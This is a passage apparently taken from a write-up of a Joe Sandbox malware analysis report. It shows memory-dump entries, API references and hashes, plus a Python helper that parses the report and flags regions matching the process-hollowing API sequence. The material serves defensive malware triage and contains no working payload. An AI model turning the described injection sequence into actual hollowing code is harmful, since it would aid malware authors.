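• Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
APIs
• ResumeThread.KERNELBASE(?), ref: 09986D5E
Memory Dump Source
• Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
Strings
Memory Dump Source
• Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
APIs
• CloseHandle.KERNELBASE(?), ref: 028EA706
Memory Dump Source
• Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
"""

# "• ApiName.MODULE(args), ref: HEXADDR"; \W* swallows the bullet and indentation.
API_RE = re.compile(r"^\W*(\w+)\.(\w+)\(.*?\),\s*ref:\s*([0-9A-Fa-f]+)")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")


def parse_calls(report_text):
    """Map region Offset -> {api name: call-site offset relative to the region base}.

    The report prints a function's API lines before its Memory Dump Source, so
    API lines are buffered until the Offset line that belongs to them arrives."""
    calls = defaultdict(dict)
    pending = []  # (api name, absolute ref) seen since the last Offset line
    for line in report_text.splitlines():
        m = API_RE.match(line)
        if m:
            pending.append((m.group(1), int(m.group(3), 16)))
            continue
        m = OFFSET_RE.search(line)
        if not m:
            continue
        base = int(m.group(1), 16)
        region = f"{base:08X}"
        for name, ref in pending:
            # A call site below the region base means an API line was paired
            # with the wrong dump source; fail loudly instead of misattributing.
            if ref < base:
                raise ValueError(f"{name} ref {ref:08X} lies below region {region}")
            calls[region][name] = ref - base
        pending = []
    return dict(calls)  # plain dict: unknown regions raise KeyError, not appear


# Either context-setter counts; the Wow64 variant is what this sample uses.
CONTEXT_APIS = {"Wow64SetThreadContext", "SetThreadContext"}


def hollowing_regions(report_text):
    """Regions whose carved functions together allocate in a target, rewrite a
    thread context and resume it: the process-hollowing sequence."""
    flagged = []
    for region, apis in parse_calls(report_text).items():
        if {"VirtualAllocEx", "ResumeThread"}.issubset(apis) and not CONTEXT_APIS.isdisjoint(apis):
            flagged.append(region)
    return sorted(flagged)


if __name__ == "__main__":
    for region, apis in sorted(parse_calls(SAMPLE).items()):
        print(region, ", ".join(f"{n}+{off:X}" for n, off in sorted(apis.items())))
    print("process-hollowing sequence in:", hollowing_regions(SAMPLE))
```

Run against the full report text (the leading whitespace is handled), the same two functions give a per-region API summary that is far easier to triage than the flat listing, and the relative offsets make it possible to cross-check the flagged functions against the corresponding memory dump rather than trusting the signature names alone.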
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: d8hq
                                            • API String ID: 0-895396709
                                            • Opcode ID: 8e41c98316c937cf42e90350ddca8ae0b94043ca23b6667fb7cb52bb8feace72
                                            • Instruction ID: 46ae8b77a30799f7d3db284edf307429fe1b53779763c28bb5121d087e67814d
                                            • Opcode Fuzzy Hash: 8e41c98316c937cf42e90350ddca8ae0b94043ca23b6667fb7cb52bb8feace72
                                            • Instruction Fuzzy Hash: BF616835B10118DFCB54DFA8D858AAE7BF2EF98711F148469E902AB391DB709C45CFA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hgq
                                            • API String ID: 0-2103768809
                                            • Opcode ID: 9242627ac384705ab17119354fdb4e01e4ff316ca891855f93a372fc83163df2
                                            • Instruction ID: c4cb5bf473140ba12eac117cfac5c6b2d57ae56f95c0d8d9133434c1fab74287
                                            • Opcode Fuzzy Hash: 9242627ac384705ab17119354fdb4e01e4ff316ca891855f93a372fc83163df2
                                            • Instruction Fuzzy Hash: BD61B135A006098FCB55DFA8C9509AE7BF2EF89310F1580AAD806EB361DB35DD46CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq
                                            • API String ID: 0-1855696158
                                            • Opcode ID: 506df2f853df8819a83a26166c50f425c69c49c4970eaff42c969d0ab25237e0
                                            • Instruction ID: 1ed048ce7800d2b843c1dd233a893aeb765c168244ec521b3d22647adc33379b
                                            • Opcode Fuzzy Hash: 506df2f853df8819a83a26166c50f425c69c49c4970eaff42c969d0ab25237e0
                                            • Instruction Fuzzy Hash: E331FB71B1060F8FCB68CAE9C85456FBBE3AFE0340B06C529D115C7254EB30E9598791
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 028EA706
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 8fb01b536813090f1fd8336d999b63a57ef179f774f22097113415611781fb9d
                                            • Instruction ID: 73c63e50e92db920d71b4a9da27191de907c68e318ec0d90cff77c34e83960e1
                                            • Opcode Fuzzy Hash: 8fb01b536813090f1fd8336d999b63a57ef179f774f22097113415611781fb9d
                                            • Instruction Fuzzy Hash: F031CCB9D002189FCF10CFA9D885AEEFBF4EB09320F24905AE815B3201C335A945CFA4
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 028EA706
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 7449cc0a1a520b0f7b50d61b03f42f42f08dbc9095af95b691bc613426779a2f
                                            • Instruction ID: b9fd4f4a170beddd83784b31260194ba8356631c26f19c784ac2371995adf66d
                                            • Opcode Fuzzy Hash: 7449cc0a1a520b0f7b50d61b03f42f42f08dbc9095af95b691bc613426779a2f
                                            • Instruction Fuzzy Hash: 7021CCB9D042189FCF10CFA9D985AEEFBF4AB09310F14905AE815B3310C375A944CF64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Tecq
                                            • API String ID: 0-1122318316
                                            • Opcode ID: 4f22ccb179e61290323a5676eceeefe4da06562eb9cdaafaed75de05dc6fcc0d
                                            • Instruction ID: 65a3e15fd744d9f7d282515aaea81391ba297ad99591634445e5331db3e985cd
                                            • Opcode Fuzzy Hash: 4f22ccb179e61290323a5676eceeefe4da06562eb9cdaafaed75de05dc6fcc0d
                                            • Instruction Fuzzy Hash: 20114F75B0020D8BCF54EBB999005FFB6F6BB98310B20407AC509EB244EB759E01CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d9520b48b8e101e744969c914fc5c20caac450a075c7e9e46adb7cabd6f894d
                                            • Instruction ID: 56f8d483e7da8a5cf214d92e3c51274564f42272db3e2d36365531e6433d7881
                                            • Opcode Fuzzy Hash: 2d9520b48b8e101e744969c914fc5c20caac450a075c7e9e46adb7cabd6f894d
                                            • Instruction Fuzzy Hash: 6B727F75D00B89CBCBB89FF498887AD7AE5AB51340F50492FC0BACB285D7769482CF45
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b70aeed4ad3d783bfaf4c389e160f9fdfe49d3ff1f941a828075b178ae2aa18
                                            • Instruction ID: 2a71083e52a03ef38a168c35df95098dbf05dc58ebb0eba280edac4bd29b1c99
                                            • Opcode Fuzzy Hash: 3b70aeed4ad3d783bfaf4c389e160f9fdfe49d3ff1f941a828075b178ae2aa18
                                            • Instruction Fuzzy Hash: 47127EB5D05F86CAD7B84FE4988839EB6D4AB11340F604D1BC0FACB259C77690878F89
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4809af2524ee4e77ad475ad32edb96c60876ab59fd33e8f2c8263c924d95a3ef
                                            • Instruction ID: b6b1088c93e0888208ed276e17a853ee12d07737f45e18399ed1c3904b375f41
                                            • Opcode Fuzzy Hash: 4809af2524ee4e77ad475ad32edb96c60876ab59fd33e8f2c8263c924d95a3ef
                                            • Instruction Fuzzy Hash: CC718E78A01208EFDB55DFA8D494DAEBBB6BF49324B114498F901AB361CB31AC81CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66a2905b4ce09e5e6c6b032a7fe67491461f65597f2009b2c55c5843f48ce5de
                                            • Instruction ID: 7c7e2f149ac49e9487046519bbdfe4981e418b510d856bb8c8c425905a01272f
                                            • Opcode Fuzzy Hash: 66a2905b4ce09e5e6c6b032a7fe67491461f65597f2009b2c55c5843f48ce5de
                                            • Instruction Fuzzy Hash: F4514C74A102089FDB54DFA9C594A9DB7F6EF88310F658069E416EB3A1CB31EC05CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6931c5e5bdaaf402bdef07e8820cc5db7ed49913e4c01c5549739269bd0f67cb
                                            • Instruction ID: 3ace5f5effd3e338939746cad32867f2a5d6eddfed9b39dc4ffe7bfa950c1f82
                                            • Opcode Fuzzy Hash: 6931c5e5bdaaf402bdef07e8820cc5db7ed49913e4c01c5549739269bd0f67cb
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be6b4324003c7e04471071af60d4c12aa133e3afd5f4f53c01b97820f06c2e56
                                            • Instruction ID: c01fa2fa0d842dc924dc9249f5eb539ed460e4b97bf480e9fddf47eddeba1d39
                                            • Opcode Fuzzy Hash: be6b4324003c7e04471071af60d4c12aa133e3afd5f4f53c01b97820f06c2e56
                                            • Instruction Fuzzy Hash: CEF050333006483BCF069B59F4009EE7FD9DFC93217044456F449C7552CA6A985297B1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08a9289c6f7c39c7d1f5578919d0d1e6abdd2948ea23d7f1685359b11737f1ff
                                            • Instruction ID: ad039448acd5158fd74aab73a8d4b5b77c32411503680453ca33c4d2598348a6
                                            • Opcode Fuzzy Hash: 08a9289c6f7c39c7d1f5578919d0d1e6abdd2948ea23d7f1685359b11737f1ff
                                            • Instruction Fuzzy Hash: 13018C303146049FC765DBA9D440E6AB3EAEFC5321BA1C67AE409CB361DB71EC02CB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: acb5c29d26870cc431958d1169b6cb7d82268e97d82860bd08f2cf3ef3d72ca5
                                            • Instruction ID: 053edd17f31605dfc78ae08400a7d8606b3837b73e2cd24a851fcdcb0ae4a973
                                            • Opcode Fuzzy Hash: acb5c29d26870cc431958d1169b6cb7d82268e97d82860bd08f2cf3ef3d72ca5
                                            • Instruction Fuzzy Hash: B901A4303106049FC764DBA9D444D6AB3EAEFC5211F94C679E40ACB365DB71EC02CB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15eedfde57b63cde473c7e974fa46713921097ccb0ee255ac452bacb9a5f650b
                                            • Instruction ID: 5d9c2f2eb6a772395882e59e9c9c0fd6dc4978838c604240f318d0ab3095bc46
                                            • Opcode Fuzzy Hash: 15eedfde57b63cde473c7e974fa46713921097ccb0ee255ac452bacb9a5f650b
                                            • Instruction Fuzzy Hash: 4DF02B32B0060CABDB25CE55D880ABF7BE6FF89214F154819F59AC7210CB36EC00CB50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 099465f9bc0fc8aaec1bfd93e5a42121a518c06c569a56e1462449921dcf62c5
                                            • Instruction ID: a0df6f85068c9effb2e443e9dc77a01321116227f5a19a43ae661dbf0b4f386a
                                            • Opcode Fuzzy Hash: 099465f9bc0fc8aaec1bfd93e5a42121a518c06c569a56e1462449921dcf62c5
                                            • Instruction Fuzzy Hash: FAF0E9B23002487BCB155E699C508BF3F9BEFC9210B044419FA1B87341CE75CC119BE5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2184925018.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e7d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1665799fa0827984c28d73d9a544cbd2999b459a01aedb047b30e07eb2db63a1
                                            • Instruction ID: 3c6e39cc5b5f3d13445879fe1ed84bb30b70ed55dd527fd9335f189926e434aa
                                            • Opcode Fuzzy Hash: 1665799fa0827984c28d73d9a544cbd2999b459a01aedb047b30e07eb2db63a1
                                            • Instruction Fuzzy Hash: E6F062724093449AEB158E19DD88B66FFA8EF91734F18C45AFD0C5A286C2799C44CAB1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae73973c71f330b5426826650ff48f38aadca649bf2fa1f6e76c7ba445fdde5f
                                            • Instruction ID: 81e229bd330c64b3f5c76c6664e885400ce23b3841294a7d6e79c4a0fc050ae6
                                            • Opcode Fuzzy Hash: ae73973c71f330b5426826650ff48f38aadca649bf2fa1f6e76c7ba445fdde5f
                                            • Instruction Fuzzy Hash: 00F05E72B051549FD308DB6AAC88D6BBBE9EBCD26471580AAE508C7361C9309C05C7E0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49c43a89641a57f115fde70591b6a7c46dfab580198bb3be3cb0f75ad7539fdc
                                            • Instruction ID: e9724bdb9ceddf8e64df3f431bab05c6bd7418903c89ea75cb400d012566cd8e
                                            • Opcode Fuzzy Hash: 49c43a89641a57f115fde70591b6a7c46dfab580198bb3be3cb0f75ad7539fdc
                                            • Instruction Fuzzy Hash: A6F049329552898EDB90DFB8C8817EC7FB1EB15201F0885BAD058D7652D6399606CF41
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c1a9fae1f742b177d95aee61edf00f9fb03d13e08a6a4db856385b64465eb25
                                            • Instruction ID: ae063d417321ada11b99e0ee470d7b6b6fee820d9cd5673914e59052bb0c5aee
                                            • Opcode Fuzzy Hash: 1c1a9fae1f742b177d95aee61edf00f9fb03d13e08a6a4db856385b64465eb25
                                            • Instruction Fuzzy Hash: 85E03972B041286F93049A6EEC84C6BBBEDEBCC660351807AF508C7351D9319C0086E0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9044d208cb765fc915e6db6da92738b77fb023ec4ec0d7103355bcfbefeaa2c0
                                            • Instruction ID: b1ce89d8dcba6520e739d45b802752f2026cd4abd70db27748ce86d75c8dce1f
                                            • Opcode Fuzzy Hash: 9044d208cb765fc915e6db6da92738b77fb023ec4ec0d7103355bcfbefeaa2c0
                                            • Instruction Fuzzy Hash: 74F03A72D501098FDB90DFA8D8417BCBBF0EB04201F0489B6D418D7641E6399A158B80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05b2dd4859768590b3035e55973ec0ac3d681b1919f6cf7e207125f97682835f
                                            • Instruction ID: 44263898b3bb61ea1d428ecd9b1aa9b26e05cf2cf806d8bf8a21fa82bc44f9c2
                                            • Opcode Fuzzy Hash: 05b2dd4859768590b3035e55973ec0ac3d681b1919f6cf7e207125f97682835f
                                            • Instruction Fuzzy Hash: 0AF02031A082658FCB01AB6CEC048EDBB70EFC232070183EBE014DB2B0EA704A59C790
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e838d7efc91e0ff91a021bec697aaddf02ef824a289a8e051583ab4dbc9e849
                                            • Instruction ID: 65c327fab4f772d74414425f77dbbe5c0489c115e1522ef7a49399206cc578e6
                                            • Opcode Fuzzy Hash: 0e838d7efc91e0ff91a021bec697aaddf02ef824a289a8e051583ab4dbc9e849
                                            • Instruction Fuzzy Hash: B0E06D36654534C78600EB8DF4814B5B3E9E745A693288496E90C8A614D326D822C7A0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e16f3660cab7abecfa852b8440321aed0a27872be1fcb535696d8f5736001bb2
                                            • Instruction ID: 844c24793ad6356aff858e9c74b62181a36dc3aa37b4c9edf43fa991b6793546
                                            • Opcode Fuzzy Hash: e16f3660cab7abecfa852b8440321aed0a27872be1fcb535696d8f5736001bb2
                                            • Instruction Fuzzy Hash: 0DE092322001486BCB029B49E800E9EBFEEEFC8311B04841AF959C7111CA7998119BA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e339815fec96e292d857d94eaccf51bef24f76bb270b95c2781a4db65c987d8b
                                            • Instruction ID: 3f74856120851a21d98ef24e587f75d9e5142cacabf0d374a2027bb58b78b452
                                            • Opcode Fuzzy Hash: e339815fec96e292d857d94eaccf51bef24f76bb270b95c2781a4db65c987d8b
                                            • Instruction Fuzzy Hash: 8AE0D831E101198FCB00EA6DE8048DDBBB9FFC6221B004566E50597220EB709919C7D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7212b3d74ff8e9bf2de9756936c0126e12d10afdd61c3143e3ea1f1de038be86
                                            • Instruction ID: 4bab55cb1ce6eb24182f7c5fe0556e837a1462c3c9507de5a6032ad6c6fba8a9
                                            • Opcode Fuzzy Hash: 7212b3d74ff8e9bf2de9756936c0126e12d10afdd61c3143e3ea1f1de038be86
                                            • Instruction Fuzzy Hash: 5BE04F36A08164EFD7219B9CF589784B7E8EB10322F0540A6E4555F141D7A9EC808BD6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f907b7f52ee1e152de44d428c235badcfaa78c28f38d49c5e88e7105bb86ae0a
                                            • Instruction ID: 712b370030227f15c0069882063a49b139bea0347114fafb1ff5e47daed7bfb0
                                            • Opcode Fuzzy Hash: f907b7f52ee1e152de44d428c235badcfaa78c28f38d49c5e88e7105bb86ae0a
                                            • Instruction Fuzzy Hash: 26E09231900A6EDBCF16CE90C800ADEF773BF89345F008895D8097B125D3B66A86CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec381ac6f7f938c92d23bb03ec4e32284c25a7276967ff70839fef474c2d292f
                                            • Instruction ID: 194629f6a983242e1c4021e0b56d976f37e0d237ab676c40e71d5273a7fe510e
                                            • Opcode Fuzzy Hash: ec381ac6f7f938c92d23bb03ec4e32284c25a7276967ff70839fef474c2d292f
                                            • Instruction Fuzzy Hash: ABD0A7344897C10FC317977088234CD7F70EE2221070665DBC0C48E053DA0444C6C793
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 769ff1890262db3c498eb43351e1e6ad7383de2cd3e3127334f17467007ae2d9
                                            • Instruction ID: da27eac1345df6edee18636213589847e528e1b441c2e2308d05fe1336c13c67
                                            • Opcode Fuzzy Hash: 769ff1890262db3c498eb43351e1e6ad7383de2cd3e3127334f17467007ae2d9
                                            • Instruction Fuzzy Hash: D0D0A77A20A1506FC712EB6CC8A08DA7FE0FFA6300B404C92D2C04B132C631841EC705
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8c5eb7ea059ce773edc7f5e14f51474c76e956da7542a58cf4b6e5b798d3af8
                                            • Instruction ID: 1d134dcba3462a2b33d78d6779412443aa2adc4ba9da1aed0f4c9d94865bb352
                                            • Opcode Fuzzy Hash: a8c5eb7ea059ce773edc7f5e14f51474c76e956da7542a58cf4b6e5b798d3af8
                                            • Instruction Fuzzy Hash: 7BD05E76A192909FC3124B58B9186A63FA8EFC7221F0A40EFDA418B106C2764902C7E3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8713988526bcd2d84ba5a58d80a28a49b554f8532878e9c9863f5da89cb4df9
                                            • Instruction ID: 7ba7f7718a9d99d242fabec8ee035e7635a2aec93b05ce377732b5062f8d44f9
                                            • Opcode Fuzzy Hash: e8713988526bcd2d84ba5a58d80a28a49b554f8532878e9c9863f5da89cb4df9
                                            • Instruction Fuzzy Hash: 1EE0EC341482849FC746DB20D855EA87F61AF55320F1580EEE5849B273D235C816CB42
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f82e521786a88cce56da5007af329c69c8cd1d8dcfee874a1b8c3af96dded98
                                            • Instruction ID: bb58b3c613d63d081a0f5c1d421df171009df939b515b78fd34278a647ca3d33
                                            • Opcode Fuzzy Hash: 7f82e521786a88cce56da5007af329c69c8cd1d8dcfee874a1b8c3af96dded98
                                            • Instruction Fuzzy Hash: 86D05E311082C8FED742DBB4D951E943F31BF29214F149189E9898B213C1679817DB12
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da8970be6eaf19253d70c087c99ed0b3a2f35a14b6b2fa6045a13c9afdd45838
                                            • Instruction ID: 3526c213a29a5a331d1ba1b6abd8b0aa9eaf9eb34d558f84c5b26623b3c61e2b
                                            • Opcode Fuzzy Hash: da8970be6eaf19253d70c087c99ed0b3a2f35a14b6b2fa6045a13c9afdd45838
                                            • Instruction Fuzzy Hash: D8C08C36200308FFDB80AFD4C801D96776DAB08720F50E104FA090E201C273FC62DBA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 997cbba34c2172f440f2bdb42e3549dfa83ac6942f8f039079a70598852752de
